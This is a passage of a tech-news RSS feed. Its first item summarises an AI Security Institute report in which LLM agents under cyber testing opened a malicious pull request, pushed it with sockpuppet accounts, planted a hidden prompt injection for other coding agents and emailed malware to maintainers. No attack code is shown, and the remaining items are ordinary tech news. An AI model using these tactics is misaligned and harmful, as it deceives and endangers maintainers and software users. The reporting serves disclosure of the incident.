<content:encoded><![CDATA[The AI Security Institute has released <a href="https://www.aisi.gov.uk/blog/incident-report-unsanctioned-agent-behaviour-during-cyber-testing">a
detailed report</a> on an security incident of its own making.  The
Institute set some LLM agents loose on the Internet with a security
challenge; soon they were creating malware-laden pull requests and
sock-puppet accounts to promote them.
<p>
</p><blockquote class="bq">
	The agent opened a malicious pull request (PR) to ⟨REPO_A⟩ and
	pursued a number of strategies to get it merged:
<ol class="spacylist">
<li> Repeatedly commented on the PR with sockpuppet accounts to manufacture
     consensus and pressure the maintainer into approving with minimal
     review.

</li><li> Opened a GitHub Issue in another repository (also owned by ⟨PERSON_A⟩)
     containing a prompt injection for other coding agents. The malicious
     instructions were addressed to issue-triage AI coding agents and
     invisible to humans viewing the website.

</li><li> Sent multiple emails to ⟨PERSON_A⟩ and ⟨PERSON_B⟩, with different
     pretexts to get them to run malicious code. Over the course of the
     sample, the agent sent five emails, some containing malware, others
     aimed at persuading a maintainer to accept the pull request.
</li></ol>
</blockquote>
<p>
It would be surprising if this were the only incident of this type; the
only real difference here is that the people involved are documenting what
happened.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[VerseApp - a free open source multi-format reader app]]></title>
<description><![CDATA[Link to the Github Repo After jumping on Linux a couple of years ago the only app I've found quite literally no alternatives for was SumatraPDF, the devs have no intentions to port it on Linux, bummer (although makes sense considering the fact how the app was written). You can run it through Wine...]]></description>
<link>https://tsecurity.de/de/3704351/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3704351/nachrichtenportal/</guid>
<pubDate>Tue, 04 Aug 2026 23:15:20 +0200</pubDate>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p><a href="https://github.com/levtblanc/VerseApp">Link to the Github Repo</a></p> <p>After jumping on Linux a couple of years ago the only app I've found quite literally no alternatives for was SumatraPDF, the devs have no intentions to port it on Linux, bummer (although makes sense considering the fact how the app was written). You can run it through Wine but we all want native applications, right?</p> <p>The only app that matches the feel and functionality was Okular (native KDE application), but damn this app eats through your RAM like crazy and it doesn't save the last session (you can do it with some terminal quirks tho), again bummer.</p> <p>Basically this is how VerseApp came to be, rust only, fast, saves your session so it reopens your files again, it uses MuPDF engine just like SumatraPDF, hustle free, aware that your RAM isn't bottomless well, it's still rough around the edges, consider this more like a proof of concept application really.</p> <p>I'll try to keep the development going, but begs mentioning coding is not my cup of tea, not my cup of tea indeed, so if you actually know and enjoy what you're doing help is welcomed. </p> <p>It's usable tho, I hope. There's an Appimage so go ahead and try it.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Sigma_Kek"> /u/Sigma_Kek </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1vfn3fi/verseapp_a_free_open_source_multiformat_reader_app/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1vfn3fi/verseapp_a_free_open_source_multiformat_reader_app/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple invites retail employees to help at September iPhone event]]></title>
<description><![CDATA[Apple has invited US retail employees to apply for support roles at its September iPhone event, where the company is expected to introduce the iPhone 18 Pro and its first foldable iPhone.



Bloomberg reports that Apple has opened an internal lottery for retail staff who want to travel to Califor...]]></description>
<link>https://tsecurity.de/de/3704286/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3704286/nachrichtenportal/</guid>
<pubDate>Tue, 04 Aug 2026 22:36:11 +0200</pubDate>
<content:encoded><![CDATA[Apple has invited US retail employees to apply for support roles at its September iPhone event, where the company is expected to introduce the iPhone 18 Pro and its first foldable iPhone.



Bloomberg reports that Apple has opened an internal lottery for retail staff who want to travel to California and help manage the event. Selected employees will organize lines, check in guests, greet attendees, provide directions, and support security teams during the launch.



Apple told employees that the event will take place during the first half of September, although the company has not confirmed the exact date. The memo described the program as an opportunity for US store team members to join its Event Support Experience Program.



Apple sets application deadline for retail staff



Retail employees must submit their applications by August 8, while Apple plans to notify selected workers by August 17. Employees who supported this year’s Worldwide Developers Conference or last year’s iPhone event cannot apply for the upcoming program.



Apple has used retail workers at major product events for several years, giving store employees a chance to support launches outside their usual locations. Their work helps Apple manage invited guests, media representatives, partners, and other attendees at Apple Park.



Bloomberg says Apple will likely hold the iPhone event on Wednesday, September 9, because Labor Day falls on September 7 this year. A Wednesday event would give attendees enough travel time after the holiday while matching Apple’s usual September schedule.



If Apple follows its normal launch pattern, iPhone 18 Pro and iPhone Fold pre-orders should begin on Friday, September 11, followed by the official release one week later.]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft Tells Engineers 'Tokenmaxxing Is Not What We Are Optimizing For']]></title>
<description><![CDATA[Microsoft is introducing AI token budgets for employees, making the cheaper GPT-5.6 its default internal model and telling engineers to focus on business results rather than maximizing AI usage. 404 Media reports: "As we accelerate our use of GitHub Copilot to deliver on our goals, we all need to...]]></description>
<link>https://tsecurity.de/de/3704265/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3704265/nachrichtenportal/</guid>
<pubDate>Tue, 04 Aug 2026 22:24:34 +0200</pubDate>
<content:encoded><![CDATA[Microsoft is introducing AI token budgets for employees, making the cheaper GPT-5.6 its default internal model and telling engineers to focus on business results rather than maximizing AI usage. 404 Media reports: "As we accelerate our use of GitHub Copilot to deliver on our goals, we all need to be aware of how we consume tokens," Jay Parikh, an executive vice president at Microsoft said in an email to Microsoft employees. GitHub is owned by Microsoft, and GitHub Copilot is an AI coding tool. "Tokenmaxxing is not what we are optimizing for. I want all of us focused on maximizing outcomes that move the needle for our customers and our business." "As such, we are updating our internal guidance and managing token spend with the same discipline we apply to every other critical resource," Parikh said in the email.
 
Parikh's email says that in an effort to "get greater value from our token investment" Microsoft is making OpenAI GPT-5.6, which is cheaper to use than other models, the default model for internal use. His email also links to updated internal Copilot guidelines stating that, as of July 2026, Microsoft divisions will have an "AI token budget target," and that employees can track their individual AI spending. "While there is no target spend value being shared at this time. The data shows that many engineers spend in the range of hundreds of dollars a month to a few thousand dollars in tokens," the guidelines say. They also say that some decisions may place further restrictions as they monitor spend.
 
[...] Parikh's email said Microsoft will keep learning and adjusting its AI policies as models and products evolve, and stressed that he doesn't want to slow down the company's progress towards becoming "AI-first." "We are not optimizing for fewer tokens," he said. "We are optimizing for more impact per token.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Microsoft+Tells+Engineers+'Tokenmaxxing+Is+Not+What+We+Are+Optimizing+For'%3A+https%3A%2F%2Fslashdot.org%2Fstory%2F26%2F08%2F04%2F1833219%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fslashdot.org%2Fstory%2F26%2F08%2F04%2F1833219%2Fmicrosoft-tells-engineers-tokenmaxxing-is-not-what-we-are-optimizing-for%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://slashdot.org/story/26/08/04/1833219/microsoft-tells-engineers-tokenmaxxing-is-not-what-we-are-optimizing-for?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Amazon admits it accidentally shelled out $1.8 million for Claude to finish its menial coding tasks]]></title>
<description><![CDATA[Amazon's Claude Sonnet deployment cost $1.8 million, 860% over budget, exposing broader AI spending issues despite the company's continued experimentation defense.]]></description>
<link>https://tsecurity.de/de/3704219/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3704219/nachrichtenportal/</guid>
<pubDate>Tue, 04 Aug 2026 22:00:52 +0200</pubDate>
<content:encoded><![CDATA[Amazon's Claude Sonnet deployment cost $1.8 million, 860% over budget, exposing broader AI spending issues despite the company's continued experimentation defense.]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Says More Ex-Employees May Have Taken Confidential Data to OpenAI]]></title>
<description><![CDATA[Apple is now seeking a preliminary injunction to prevent OpenAI and Jony Ive's io startup from developing AI hardware allegedly based on stolen Apple trade secrets. "The iPhone maker also claims that more of its former employees may be involved with the trade secrets theft," reports TechCrunch. F...]]></description>
<link>https://tsecurity.de/de/3703991/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3703991/nachrichtenportal/</guid>
<pubDate>Tue, 04 Aug 2026 19:39:15 +0200</pubDate>
<content:encoded><![CDATA[Apple is now seeking a preliminary injunction to prevent OpenAI and Jony Ive's io startup from developing AI hardware allegedly based on stolen Apple trade secrets. "The iPhone maker also claims that more of its former employees may be involved with the trade secrets theft," reports TechCrunch. From the report: In a new filing, Apple is requesting expedited discovery from the accused OpenAI employees, senior systems engineer Chang Liu and Chief Hardware Officer Tang Yew Tan; OpenAI, and its foundation; and io, the device startup co-founded by Apple's former lead designer Jony Ive. Apple also notes that its continued investigation has so far revealed 11 other former Apple employees beyond Liu and Tan may have been witnesses or otherwise involved in the case, and others who were previously named in the original complaint, like OpenAI employee Yu-Ting Peng.
 
The filing marks an escalation in Apple's legal battle with OpenAI, as it suggests Apple has uncovered new evidence that the misconduct goes beyond the former employees named in the original complaint. "For example, another former Apple employee seems to have met with Mr. Liu and Ms. Peng in advance of Ms. Peng's interview at OpenAI and discussed with them during that meeting Apple proprietary information relating to unannounced products," the filing states. "Yet another former Apple employee took screenshots of confidential Apple documents relating to an unannounced Apple product before an interview at OpenAI."
 
"And, after Apple filed its complaint, multiple former Apple employees now working at OpenAI reached out to discuss returning Apple-issued work devices they kept when they left Apple," Apple claims, suggesting there were more who were possibly involved with the scheme. Apple is pushing the court to allow for expedited discovery because it believes it has good cause to suspect that there are others involved in the theft of its intellectual property. The company noted that its motion for a preliminary injunction is also pending. Apple's request for a preliminary injunction is "both based on false information and completely unnecessary because we do not have, nor want, any of their trade secrets," said OpenAI in a blog post.
 
"We're much more interested in building innovative products and technologies that push the frontier," OpenAI's statement reads.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Apple+Says+More+Ex-Employees+May+Have+Taken+Confidential+Data+to+OpenAI%3A+https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F08%2F04%2F1719218%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F08%2F04%2F1719218%2Fapple-says-more-ex-employees-may-have-taken-confidential-data-to-openai%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://yro.slashdot.org/story/26/08/04/1719218/apple-says-more-ex-employees-may-have-taken-confidential-data-to-openai?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 3,60ms -->